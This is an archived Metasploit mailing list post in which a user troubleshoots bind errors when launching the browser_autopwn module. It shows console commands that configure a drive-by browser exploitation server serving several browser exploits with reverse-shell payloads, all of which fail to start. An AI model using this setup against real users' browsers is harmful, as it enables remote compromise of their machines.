Metasploit mailing list archives

server/browser_autopwn error


From: go.hawaii () gmx de
Date: Fri, 13 Nov 2009 21:45:39 +0100

Hi,

using server/browser_autopwn gives me the following errors:

msf > use server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST 192.168.178.190
LHOST => 192.168.178.190
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.178.190
SRVHOST => 192.168.178.190
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.178.190  yes       The IP address to use for
reverse-connect payloads
   SRVHOST     192.168.178.190  yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming
connections
   SSLVersion  SSL3             no        Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this
exploit (default is random)

msf auxiliary(browser_autopwn) > exploit -j
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.178.190...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
[-] Failed to start exploit module multi/browser/firefox_escape_retval
[*] Starting exploit multi/browser/mozilla_compareto with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
[-] Failed to start exploit module multi/browser/mozilla_compareto
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
[-] Failed to start exploit module multi/browser/mozilla_navigatorjava
[*] Starting exploit multi/browser/opera_configoverwrite with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
[-] Failed to start exploit module multi/browser/opera_configoverwrite
[*] Starting exploit multi/browser/opera_historysearch with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
[-] Failed to start exploit module multi/browser/opera_historysearch
[*] Starting exploit osx/browser/safari_metadata_archive with payload
generic/shell_reverse_tcp
*[-] Exploit failed: Cannot assign requested address - bind(2)*
Interrupt: use the 'exit' command to quit


Has anybody an idea??


Here is the netstat output before "exploit -j":

Honolulu ~ # netstat -tanp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address        
State       PID/Program name
tcp        0      0 127.0.0.1:5432          0.0.0.0:*              
LISTEN      5756/postgres  

and after:

Honolulu ~ # netstat -tanp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address        
State       PID/Program name
tcp        0      0 0.0.0.0:3333            0.0.0.0:*              
LISTEN      8863/ruby      
tcp        0      0 0.0.0.0:6666            0.0.0.0:*              
LISTEN      8863/ruby      
tcp        0      0 127.0.0.1:5432          0.0.0.0:*              
LISTEN      5756/postgres 



and the msf version:

msf > version
Framework: 3.3-rc1.7416
Console  : 3.3-rc1.7450



Thanks for your help.

Cheers,
Nick

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: